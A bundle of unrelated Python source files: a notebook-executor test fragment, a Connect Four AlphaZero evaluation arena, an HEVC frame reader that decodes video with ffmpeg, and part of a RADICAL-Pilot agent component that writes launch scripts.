# Just the idle message should be fetched
assert message_mock.call_count == 1
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error', 'ename': 'NotImplementedError'},
}
)
def test_allow_error_names(self, executor, cell_mock, message_mock):
executor.allow_error_names = ['NotImplementedError']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# Just the idle message should be fetched
assert message_mock.call_count == 1
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_raises_exception_tag(self, executor, cell_mock, message_mock):
cell_mock.metadata['tags'] = ['raises-exception']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# Just the idle message should be fetched
assert message_mock.call_count == 1
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_non_code_cell(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[])
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
# Nothing should be fetched for a non-code cell
assert message_mock.call_count == 0
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_no_source(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(
# Stripped source is empty
source=' ',
metadata={},
cell_type='code',
outputs=[],
)
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
# Nothing should be fetched for a cell with empty source
assert message_mock.call_count == 0
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks()
def test_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:3]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
for hook in hooks[:4]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[5:]:
hook.assert_not_called()
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_non_code_cell_hooks(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[])
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:1]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[1:]:
hook.assert_not_called()
@prepare_cell_mocks()
def test_async_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [AsyncMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:3]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_async_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [AsyncMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
for hook in hooks[:4]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
|
evaluator_c4.py
|
"""
Python 3.9 класс арены для сопоставления
Название файла evalator_c4.py
класс арены для сопоставления текущей нейронной сети с нейронной сетью из предыдущей итерации, и сохраняет
нейронную сеть, которая выигрывает большинство игр
Version: 0.1
Author: Andrej Marinchenko
Date: 2021-12-20
"""
#!/usr/bin/env python
import os.path
import torch
import numpy as np
from alpha_net_c4 import ConnectNet
from connect_board import board as cboard
import encoder_decoder_c4 as ed
import copy
from MCTS_c4 import UCT_search, do_decode_n_move_pieces, get_policy
import pickle
import torch.multiprocessing as mp
import datetime
import logging
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s', \
datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
logger = logging.getLogger(__file__)
def save_as_pickle(filename, data):
completeName = os.path.join("./evaluator_data/",\
filename)
with open(completeName, 'wb') as output:
pickle.dump(data, output)
def load_pickle(filename):
completeName = os.path.join("./evaluator_data/",\
filename)
with open(completeName, 'rb') as pkl_file:
data = pickle.load(pkl_file)
return data
class arena():
def __init__(self, current_cnet, best_cnet):
self.current = current_cnet
self.best = best_cnet
def play_round(self):
logger.info("Starting game round...")
if np.random.uniform(0,1) <= 0.5:
white = self.current; black = self.best; w = "current"; b = "best"
else:
white = self.best; black = self.current; w = "best"; b = "current"
current_board = cboard()
checkmate = False
dataset = []
value = 0; t = 0.1
while checkmate == False and current_board.actions() != []:
dataset.append(copy.deepcopy(ed.encode_board(current_board)))
print(""); print(current_board.current_board)
if current_board.player == 0:
root = UCT_search(current_board,777,white,t)
policy = get_policy(root, t); print("Policy: ", policy, "white = %s" %(str(w)))
elif current_board.player == 1:
root = UCT_search(current_board,777,black,t)
policy = get_policy(root, t); print("Policy: ", policy, "black = %s" %(str(b)))
current_board = do_decode_n_move_pieces(current_board,\
np.random.choice(np.array([0,1,2,3,4,5,6]), \
p = policy)) # decode move and move piece(s)
if current_board.check_winner() == True: # someone wins
if current_board.player == 0: # black wins
value = -1
elif current_board.player == 1: # white wins
value = 1
checkmate = True
dataset.append(ed.encode_board(current_board))
if value == -1:
dataset.append(f"{b} as black wins")
return b, dataset
elif value == 1:
dataset.append(f"{w} as white wins")
return w, dataset
else:
dataset.append("Nobody wins")
return None, dataset
def evaluate(self, num_games, cpu):
current_wins = 0
logger.info("[CPU %d]: Starting games..." % cpu)
for i in range(num_games):
with torch.no_grad():
winner, dataset = self.play_round(); print("%s wins!" % winner)
if winner == "current":
current_wins += 1
save_as_pickle("evaluate_net_dataset_cpu%i_%i_%s_%s" % (cpu,i,datetime.datetime.today().strftime("%Y-%m-%d"),\
str(winner)),dataset)
print("Current_net wins ratio: %.5f" % (current_wins/num_games))
save_as_pickle("wins_cpu_%i" % (cpu),\
{"best_win_ratio": current_wins/num_games, "num_games":num_games})
logger.info("[CPU %d]: Finished arena games!" % cpu)
def fork_process(arena_obj, num_games, cpu): # make arena picklable
arena_obj.evaluate(num_games, cpu)
def evaluate_nets(args, iteration_1, iteration_2) :
logger.info("Loading nets...")
current_net="%s_iter%d.pth.tar" % (args.neural_net_name, iteration_2); best_net="%s_iter%d.pth.tar" % (args.neural_net_name, iteration_1)
current_net_filename = os.path.join("./model_data/",\
current_net)
best_net_filename = os.path.join("./model_data/",\
best_net)
logger.info("Current net: %s" % current_net)
logger.info("Previous (Best) net: %s" % best_net)
current_cnet = ConnectNet()
best_cnet = ConnectNet()
cuda = torch.cuda.is_available()
if cuda:
current_cnet.cuda()
best_cnet.cuda()
if not os.path.isdir("./evaluator_data/"):
os.mkdir("evaluator_data")
if args.MCTS_num_processes > 1:
mp.set_start_method("spawn",force=True)
current_cnet.share_memory(); best_cnet.share_memory()
current_cnet.eval(); best_cnet.eval()
checkpoint = torch.load(current_net_filename)
current_cnet.load_state_dict(checkpoint['state_dict'])
checkpoint = torch.load(best_net_filename)
best_cnet.load_state_dict(checkpoint['state_dict'])
processes = []
if args.MCTS_num_processes > mp.cpu_count():
num_processes = mp.cpu_count()
logger.info("Required number of processes exceed number of CPUs! Setting MCTS_num_processes to %d" % num_processes)
else:
num_processes = args.MCTS_num_processes
logger.info("Spawning %d processes..." % num_processes)
with torch.no_grad():
for i in range(num_processes):
p = mp.Process(target=fork_process,args=(arena(current_cnet,best_cnet), args.num_evaluator_games, i))
p.start()
processes.append(p)
for p in processes:
p.join()
wins_ratio = 0.0
for i in range(num_processes):
stats = load_pickle("wins_cpu_%i" % (i))
wins_ratio += stats['best_win_ratio']
wins_ratio = wins_ratio/num_processes
if wins_ratio >= 0.55:
return iteration_2
else:
return iteration_1
elif args.MCTS_num_processes == 1:
current_cnet.eval(); best_cnet.eval()
checkpoint = torch.load(current_net_filename)
current_cnet.load_state_dict(checkpoint['state_dict'])
checkpoint = torch.load(best_net_filename)
best_cnet.load_state_dict(checkpoint['state_dict'])
arena1 = arena(current_cnet=current_cnet, best_cnet=best_cnet)
arena1.evaluate(num_games=args.num_evaluator_games, cpu=0)
stats = load_pickle("wins_cpu_%i" % (0))
if stats['best_win_ratio'] >= 0.55:
return iteration_2
else:
return iteration_1
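# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): how evaluate_nets()
# could be driven from a small argparse-style namespace.  The attribute names
# mirror how `args` is read above; the checkpoint prefix, game count and
# iteration numbers are illustrative assumptions.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    from argparse import Namespace
    args = Namespace(neural_net_name="cc4_current_net",  # assumed checkpoint prefix
                     MCTS_num_processes=1,               # single-process arena
                     num_evaluator_games=10)             # games per evaluation run
    # Pits iteration 1 against iteration 0 and returns the stronger iteration.
    best_iteration = evaluate_nets(args, iteration_1=0, iteration_2=1)
    print("Best iteration after evaluation: %d" % best_iteration)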
|
framereader.py
|
# pylint: skip-file
import json
import os
import pickle
import struct
import subprocess
import tempfile
import threading
from enum import IntEnum
from functools import wraps
import numpy as np
from lru import LRU
import _io
from tools.lib.cache import cache_path_for_file_path
from tools.lib.exceptions import DataUnreadableError
from common.file_helpers import atomic_write_in_dir
try:
from xx.chffr.lib.filereader import FileReader
except ImportError:
from tools.lib.filereader import FileReader
HEVC_SLICE_B = 0
HEVC_SLICE_P = 1
HEVC_SLICE_I = 2
class GOPReader:
def get_gop(self, num):
# returns (start_frame_num, num_frames, frames_to_skip, gop_data)
raise NotImplementedError
class DoNothingContextManager:
def __enter__(self):
return self
def __exit__(self, *x):
pass
class FrameType(IntEnum):
raw = 1
h265_stream = 2
def fingerprint_video(fn):
with FileReader(fn) as f:
header = f.read(4)
if len(header) == 0:
raise DataUnreadableError(f"{fn} is empty")
elif header == b"\x00\xc0\x12\x00":
return FrameType.raw
elif header == b"\x00\x00\x00\x01":
if 'hevc' in fn:
return FrameType.h265_stream
else:
raise NotImplementedError(fn)
else:
raise NotImplementedError(fn)
def ffprobe(fn, fmt=None):
cmd = ["ffprobe",
"-v", "quiet",
"-print_format", "json",
"-show_format", "-show_streams"]
if fmt:
cmd += ["-f", fmt]
cmd += [fn]
try:
ffprobe_output = subprocess.check_output(cmd)
except subprocess.CalledProcessError:
raise DataUnreadableError(fn)
return json.loads(ffprobe_output)
def vidindex(fn, typ):
vidindex_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "vidindex")
vidindex = os.path.join(vidindex_dir, "vidindex")
subprocess.check_call(["make"], cwd=vidindex_dir, stdout=open("/dev/null", "w"))
with tempfile.NamedTemporaryFile() as prefix_f, \
tempfile.NamedTemporaryFile() as index_f:
try:
subprocess.check_call([vidindex, typ, fn, prefix_f.name, index_f.name])
except subprocess.CalledProcessError:
raise DataUnreadableError(f"vidindex failed on file {fn}")
with open(index_f.name, "rb") as f:
index = f.read()
with open(prefix_f.name, "rb") as f:
prefix = f.read()
index = np.frombuffer(index, np.uint32).reshape(-1, 2)
assert index[-1, 0] == 0xFFFFFFFF
assert index[-1, 1] == os.path.getsize(fn)
return index, prefix
def cache_fn(func):
@wraps(func)
def cache_inner(fn, *args, **kwargs):
if kwargs.pop('no_cache', None):
cache_path = None
else:
cache_prefix = kwargs.pop('cache_prefix', None)
cache_path = cache_path_for_file_path(fn, cache_prefix)
if cache_path and os.path.exists(cache_path):
with open(cache_path, "rb") as cache_file:
cache_value = pickle.load(cache_file)
else:
cache_value = func(fn, *args, **kwargs)
if cache_path:
with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file:
pickle.dump(cache_value, cache_file, -1)
return cache_value
return cache_inner
@cache_fn
def index_stream(fn, typ):
assert typ in ("hevc", )
with FileReader(fn) as f:
assert os.path.exists(f.name), fn
index, prefix = vidindex(f.name, typ)
probe = ffprobe(f.name, typ)
return {
'index': index,
'global_prefix': prefix,
'probe': probe
}
def index_videos(camera_paths, cache_prefix=None):
"""Requires that paths in camera_paths are contiguous and of the same type."""
if len(camera_paths) < 1:
raise ValueError("must provide at least one video to index")
frame_type = fingerprint_video(camera_paths[0])
for fn in camera_paths:
index_video(fn, frame_type, cache_prefix)
def index_video(fn, frame_type=None, cache_prefix=None):
cache_path = cache_path_for_file_path(fn, cache_prefix)
if os.path.exists(cache_path):
return
if frame_type is None:
frame_type = fingerprint_video(fn)
if frame_type == FrameType.h265_stream:
index_stream(fn, "hevc", cache_prefix=cache_prefix)
else:
raise NotImplementedError("Only h265 supported")
def get_video_index(fn, frame_type, cache_prefix=None):
cache_path = cache_path_for_file_path(fn, cache_prefix)
if not os.path.exists(cache_path):
index_video(fn, frame_type, cache_prefix)
if not os.path.exists(cache_path):
return None
with open(cache_path, "rb") as cache_file:
return pickle.load(cache_file)
def read_file_check_size(f, sz, cookie):
buff = bytearray(sz)
bytes_read = f.readinto(buff)
assert bytes_read == sz, (bytes_read, sz)
return buff
def rgb24toyuv420(rgb):
yuv_from_rgb = np.array([[ 0.299 , 0.587 , 0.114 ],
[-0.14714119, -0.28886916, 0.43601035 ],
[ 0.61497538, -0.51496512, -0.10001026 ]])
img = np.dot(rgb.reshape(-1, 3), yuv_from_rgb.T).reshape(rgb.shape)
y_len = img.shape[0] * img.shape[1]
uv_len = y_len // 4
ys = img[:, :, 0]
us = (img[::2, ::2, 1] + img[1::2, ::2, 1] + img[::2, 1::2, 1] + img[1::2, 1::2, 1]) / 4 + 128
vs = (img[::2, ::2, 2] + img[1::2, ::2, 2] + img[::2, 1::2, 2] + img[1::2, 1::2, 2]) / 4 + 128
yuv420 = np.empty(y_len + 2 * uv_len, dtype=img.dtype)
yuv420[:y_len] = ys.reshape(-1)
yuv420[y_len:y_len + uv_len] = us.reshape(-1)
yuv420[y_len + uv_len:y_len + 2 * uv_len] = vs.reshape(-1)
return yuv420.clip(0, 255).astype('uint8')
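# ---------------------------------------------------------------------------
# Hedged aside (not part of the original module): a quick shape check for
# rgb24toyuv420().  For an HxW RGB frame the packed planar YUV420 buffer holds
# H*W luma bytes plus H*W/4 bytes per chroma plane, i.e. H*W*3//2 in total.
# A minimal sketch, assuming only numpy:
#
#     frame = np.zeros((480, 640, 3), dtype=np.uint8)   # dummy black frame
#     packed = rgb24toyuv420(frame)
#     assert packed.shape == (480 * 640 * 3 // 2,)      # 460800 bytes
# ---------------------------------------------------------------------------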
def decompress_video_data(rawdat, vid_fmt, w, h, pix_fmt):
# using a tempfile is much faster than proc.communicate for some reason
with tempfile.TemporaryFile() as tmpf:
tmpf.write(rawdat)
tmpf.seek(0)
threads = os.getenv("FFMPEG_THREADS", "0")
cuda = os.getenv("FFMPEG_CUDA", "0") == "1"
proc = subprocess.Popen(
["ffmpeg",
"-threads", threads,
"-hwaccel", "none" if not cuda else "cuda",
"-c:v", "hevc",
"-vsync", "0",
"-f", vid_fmt,
"-flags2", "showall",
"-i", "pipe:0",
"-threads", threads,
"-f", "rawvideo",
"-pix_fmt", pix_fmt,
"pipe:1"],
stdin=tmpf, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
# dat = proc.communicate()[0]
dat = proc.stdout.read()
if proc.wait() != 0:
raise DataUnreadableError("ffmpeg failed")
if pix_fmt == "rgb24":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, h, w, 3)
elif pix_fmt == "yuv420p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, (h*w*3//2))
elif pix_fmt == "yuv444p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, 3, h, w)
else:
raise NotImplementedError
return ret
class BaseFrameReader:
# properties: frame_type, frame_count, w, h
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def close(self):
pass
def get(self, num, count=1, pix_fmt="yuv420p"):
raise NotImplementedError
def FrameReader(fn, cache_prefix=None, readahead=False, readbehind=False, index_data=None):
frame_type = fingerprint_video(fn)
if frame_type == FrameType.raw:
return RawFrameReader(fn)
elif frame_type in (FrameType.h265_stream,):
if not index_data:
index_data = get_video_index(fn, frame_type, cache_prefix)
return StreamFrameReader(fn, frame_type, index_data, readahead=readahead, readbehind=readbehind)
else:
raise NotImplementedError(frame_type)
class RawData:
def __init__(self, f):
self.f = _io.FileIO(f, 'rb')
self.lenn = struct.unpack("I", self.f.read(4))[0]
self.count = os.path.getsize(f) // (self.lenn+4)
def read(self, i):
self.f.seek((self.lenn+4)*i + 4)
return self.f.read(self.lenn)
class RawFrameReader(BaseFrameReader):
def __init__(self, fn):
# raw camera
self.fn = fn
self.frame_type = FrameType.raw
self.rawfile = RawData(self.fn)
self.frame_count = self.rawfile.count
self.w, self.h = 640, 480
def load_and_debayer(self, img):
img = np.frombuffer(img, dtype='uint8').reshape(960, 1280)
cimg = np.dstack([img[0::2, 1::2], ((img[0::2, 0::2].astype("uint16") + img[1::2, 1::2].astype("uint16")) >> 1).astype("uint8"), img[1::2, 0::2]])
return cimg
def get(self, num, count=1, pix_fmt="yuv420p"):
assert self.frame_count is not None
assert num+count <= self.frame_count
if pix_fmt not in ("yuv420p", "rgb24"):
raise ValueError(f"Unsupported pixel format {pix_fmt!r}")
app = []
for i in range(num, num+count):
dat = self.rawfile.read(i)
rgb_dat = self.load_and_debayer(dat)
if pix_fmt == "rgb24":
app.append(rgb_dat)
elif pix_fmt == "yuv420p":
app.append(rgb24toyuv420(rgb_dat))
else:
raise NotImplementedError
return app
class VideoStreamDecompressor:
def __init__(self, fn, vid_fmt, w, h, pix_fmt):
self.fn = fn
self.vid_fmt = vid_fmt
self.w = w
self.h = h
self.pix_fmt = pix_fmt
if pix_fmt == "yuv420p":
self.out_size = w*h*3//2 # yuv420p
elif pix_fmt in ("rgb24", "yuv444p"):
self.out_size = w*h*3
else:
raise NotImplementedError
self.proc = None
self.t = threading.Thread(target=self.write_thread)
self.t.daemon = True
def write_thread(self):
try:
with FileReader(self.fn) as f:
while True:
r = f.read(1024*1024)
if len(r) == 0:
break
self.proc.stdin.write(r)
finally:
self.proc.stdin.close()
def read(self):
threads = os.getenv("FFMPEG_THREADS", "0")
cuda = os.getenv("FFMPEG_CUDA", "0") == "1"
cmd = [
"ffmpeg",
"-threads", threads,
"-hwaccel", "none" if not cuda else "cuda",
"-c:v", "hevc",
# "-avioflags", "direct",
"-analyzeduration", "0",
"-probesize", "32",
"-flush_packets", "0",
# "-fflags", "nobuffer",
"-vsync", "0",
"-f", self.vid_fmt,
"-i", "pipe:0",
"-threads", threads,
"-f", "rawvideo",
"-pix_fmt", self.pix_fmt,
"pipe:1"
]
self.proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
try:
self.t.start()
while True:
dat = self.proc.stdout.read(self.out_size)
if len(dat) == 0:
break
assert len(dat) == self.out_size
if self.pix_fmt == "rgb24":
ret = np.frombuffer(dat, dtype=np.uint8).reshape((self.h, self.w, 3))
elif self.pix_fmt == "yuv420p":
ret = np.frombuffer(dat, dtype=np.uint8)
elif self.pix_fmt == "yuv444p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape((3, self.h, self.w))
else:
assert False
yield ret
result_code = self.proc.wait()
assert result_code == 0, result_code
finally:
self.proc.kill()
self.t.join()
class StreamGOPReader(GOPReader):
def __init__(self, fn, frame_type, index_data):
assert frame_type == FrameType.h265_stream
self.fn = fn
self.frame_type = frame_type
self.frame_count = None
self.w, self.h = None, None
self.prefix = None
self.index = None
self.index = index_data['index']
self.prefix = index_data['global_prefix']
probe = index_data['probe']
self.prefix_frame_data = None
self.num_prefix_frames = 0
self.vid_fmt = "hevc"
i = 0
while i < self.index.shape[0] and self.index[i, 0] != HEVC_SLICE_I:
i += 1
self.first_iframe = i
assert self.first_iframe == 0
self.frame_count = len(self.index) - 1
self.w = probe['streams'][0]['width']
self.h = probe['streams'][0]['height']
def _lookup_gop(self, num):
frame_b = num
while frame_b > 0 and self.index[frame_b, 0] != HEVC_SLICE_I:
frame_b -= 1
frame_e = num + 1
while frame_e < (len(self.index) - 1) and self.index[frame_e, 0] != HEVC_SLICE_I:
frame_e += 1
offset_b = self.index[frame_b, 1]
offset_e = self.index[frame_e, 1]
return (frame_b, frame_e, offset_b, offset_e)
def get_gop(self, num):
frame_b, frame_e, offset_b, offset_e = self._lookup_gop(num)
assert frame_b <= num < frame_e
num_frames = frame_e - frame_b
with FileReader(self.fn) as f:
f.seek(offset_b)
rawdat = f.read(offset_e - offset_b)
if num < self.first_iframe:
assert self.prefix_frame_data
rawdat = self.prefix_frame_data + rawdat
rawdat = self.prefix + rawdat
skip_frames = 0
if num < self.first_iframe:
skip_frames = self.num_prefix_frames
return frame_b, num_frames, skip_frames, rawdat
class GOPFrameReader(BaseFrameReader):
#FrameReader with caching and readahead for formats that are group-of-picture based
def __init__(self, readahead=False, readbehind=False):
self.open_ = True
self.readahead = readahead
self.readbehind = readbehind
self.frame_cache = LRU(64)
if self.readahead:
self.cache_lock = threading.RLock()
self.readahead_last = None
self.readahead_len = 30
self.readahead_c = threading.Condition()
self.readahead_thread = threading.Thread(target=self._readahead_thread)
self.readahead_thread.daemon = True
self.readahead_thread.start()
else:
self.cache_lock = DoNothingContextManager()
def close(self):
if not self.open_:
return
self.open_ = False
if self.readahead:
self.readahead_c.acquire()
self.readahead_c.notify()
self.readahead_c.release()
self.readahead_thread.join()
def _readahead_thread(self):
while True:
self.readahead_c.acquire()
try:
if not self.open_:
break
self.readahead_c.wait()
finally:
self.readahead_c.release()
if not self.open_:
break
assert self.readahead_last
num, pix_fmt = self.readahead_last
if self.readbehind:
for k in range(num - 1, max(0, num - self.readahead_len), -1):
self._get_one(k, pix_fmt)
else:
for k in range(num, min(self.frame_count, num + self.readahead_len)):
self._get_one(k, pix_fmt)
def _get_one(self, num, pix_fmt):
assert num < self.frame_count
if (num, pix_fmt) in self.frame_cache:
return self.frame_cache[(num, pix_fmt)]
with self.cache_lock:
if (num, pix_fmt) in self.frame_cache:
return self.frame_cache[(num, pix_fmt)]
frame_b, num_frames, skip_frames, rawdat = self.get_gop(num)
ret = decompress_video_data(rawdat, self.vid_fmt, self.w, self.h, pix_fmt)
ret = ret[skip_frames:]
assert ret.shape[0] == num_frames
for i in range(ret.shape[0]):
self.frame_cache[(frame_b+i, pix_fmt)] = ret[i]
return self.frame_cache[(num, pix_fmt)]
def get(self, num, count=1, pix_fmt="yuv420p"):
assert self.frame_count is not None
if num + count > self.frame_count:
raise ValueError(f"{num + count} > {self.frame_count}")
if pix_fmt not in ("yuv420p", "rgb24", "yuv444p"):
raise ValueError(f"Unsupported pixel format {pix_fmt!r}")
ret = [self._get_one(num + i, pix_fmt) for i in range(count)]
if self.readahead:
self.readahead_last = (num+count, pix_fmt)
self.readahead_c.acquire()
self.readahead_c.notify()
self.readahead_c.release()
return ret
class StreamFrameReader(StreamGOPReader, GOPFrameReader):
def __init__(self, fn, frame_type, index_data, readahead=False, readbehind=False):
StreamGOPReader.__init__(self, fn, frame_type, index_data)
GOPFrameReader.__init__(self, readahead, readbehind)
def GOPFrameIterator(gop_reader, pix_fmt):
dec = VideoStreamDecompressor(gop_reader.fn, gop_reader.vid_fmt, gop_reader.w, gop_reader.h, pix_fmt)
yield from dec.read()
def FrameIterator(fn, pix_fmt, **kwargs):
fr = FrameReader(fn, **kwargs)
if isinstance(fr, GOPReader):
yield from GOPFrameIterator(fr, pix_fmt)
else:
for i in range(fr.frame_count):
yield fr.get(i, pix_fmt=pix_fmt)[0]
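# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module).  The segment path is
# an illustrative placeholder; any HEVC segment this module can index should
# behave the same way.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    example_path = "/path/to/segment/fcamera.hevc"  # placeholder, point at a real file
    # Random access through FrameReader ...
    fr = FrameReader(example_path)
    print("frame count:", fr.frame_count, "resolution:", fr.w, "x", fr.h)
    first_frame = fr.get(0, pix_fmt="rgb24")[0]
    print("first frame shape:", first_frame.shape)
    # ... or sequential decoding through FrameIterator.
    for i, frame in enumerate(FrameIterator(example_path, pix_fmt="yuv420p")):
        if i >= 5:
            break
        print("decoded frame", i, "buffer size:", frame.shape)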
|
funcs.py
|
__copyright__ = "Copyright 2013-2016, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import stat
import time
import queue
import threading as mt
import subprocess
import radical.utils as ru
from .... import pilot as rp
from ... import utils as rpu
from ... import states as rps
from ... import constants as rpc
from .base import AgentExecutingComponent
# ------------------------------------------------------------------------------
#
class FUNCS(AgentExecutingComponent) :
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
AgentExecutingComponent.__init__ (self, cfg, session)
self._collector = None
self._terminate = mt.Event()
# --------------------------------------------------------------------------
#
def initialize(self):
self._pwd = os.getcwd()
self.gtod = "%s/gtod" % self._pwd
self.register_input(rps.AGENT_EXECUTING_PENDING,
rpc.AGENT_EXECUTING_QUEUE, self.work)
self.register_output(rps.AGENT_STAGING_OUTPUT_PENDING,
rpc.AGENT_STAGING_OUTPUT_QUEUE)
self.register_publisher (rpc.AGENT_UNSCHEDULE_PUBSUB)
self.register_subscriber(rpc.CONTROL_PUBSUB, self.command_cb)
addr_wrk = self._cfg['bridges']['funcs_req_queue']
addr_res = self._cfg['bridges']['funcs_res_queue']
self._log.debug('wrk in addr: %s', addr_wrk['addr_in' ])
self._log.debug('res out addr: %s', addr_res['addr_out'])
self._funcs_req = rpu.Queue(self._session, 'funcs_req_queue',
rpu.QUEUE_INPUT, self._cfg,
addr_wrk['addr_in'])
self._funcs_res = rpu.Queue(self._session, 'funcs_res_queue',
rpu.QUEUE_OUTPUT, self._cfg,
addr_res['addr_out'])
self._cancel_lock = ru.RLock()
self._cus_to_cancel = list()
self._cus_to_watch = list()
self._watch_queue = queue.Queue ()
self._pid = self._cfg['pid']
# run watcher thread
self._collector = mt.Thread(target=self._collect)
self._collector.daemon = True
self._collector.start()
# we need to launch the executors on all nodes, and use the
# agent_launcher for that
self._launcher = rp.agent.LaunchMethod.create(
name = self._cfg.get('agent_launch_method'),
cfg = self._cfg,
session = self._session)
# now run the func launcher on all nodes
ve = os.environ.get('VIRTUAL_ENV', '')
exe = ru.which('radical-pilot-agent-funcs')
if not exe:
exe = '%s/rp_install/bin/radical-pilot-agent-funcs' % self._pwd
for idx, node in enumerate(self._cfg['rm_info']['node_list']):
uid = 'func_exec.%04d' % idx
pwd = '%s/%s' % (self._pwd, uid)
funcs = {'uid' : uid,
'description': {'executable' : exe,
'arguments' : [pwd, ve],
'cpu_processes': 1,
'environment' : [],
},
'slots' : {'nodes' : [{'name' : node[0],
'uid' : node[1],
'cores' : [[0]],
'gpus' : []
}]
},
'cfg' : {'addr_wrk' : addr_wrk['addr_out'],
'addr_res' : addr_res['addr_in']
}
}
self._spawn(self._launcher, funcs)
# --------------------------------------------------------------------------
#
def command_cb(self, topic, msg):
self._log.info('command_cb [%s]: %s', topic, msg)
cmd = msg['cmd']
arg = msg['arg']
if cmd == 'cancel_units':
self._log.info("cancel_units command (%s)" % arg)
with self._cancel_lock:
self._cus_to_cancel.extend(arg['uids'])
return True
# --------------------------------------------------------------------------
#
def _spawn(self, launcher, funcs):
# NOTE: see documentation of funcs['sandbox'] semantics in the ComputeUnit
# class definition.
sandbox = '%s/%s' % (self._pwd, funcs['uid'])
fname = '%s/%s.sh' % (sandbox, funcs['uid'])
cfgname = '%s/%s.cfg' % (sandbox, funcs['uid'])
descr = funcs['description']
rpu.rec_makedir(sandbox)
ru.write_json(funcs.get('cfg'), cfgname)
launch_cmd, hop_cmd = launcher.construct_command(funcs, fname)
if hop_cmd : cmdline = hop_cmd
else : cmdline = fname
with open(fname, "w") as fout:
fout.write('#!/bin/sh\n\n')
# Create string for environment variable setting
fout.write('export RP_SESSION_ID="%s"\n' % self._cfg['sid'])
fout.write('export RP_PILOT_ID="%s"\n' % self._cfg['pid'])
fout.write('export RP_AGENT_ID="%s"\n' % self._cfg['aid'])
fout.write('export RP_SPAWNER_ID="%s"\n' % self.uid)
fout.write('export RP_FUNCS_ID="%s"\n' % funcs['uid'])
fout.write('export RP_GTOD="%s"\n' % self.gtod)
fout.write('export RP_TMP="%s"\n' % self._cu_tmp)
# also add any env vars requested in the unit description
if descr.get('environment', []):
for key,val in descr['environment'].items():
fout.write('export "%s=%s"\n' % (key, val))
fout.write('\n%s\n\n' % launch_cmd)
fout.write('RETVAL=$?\n')
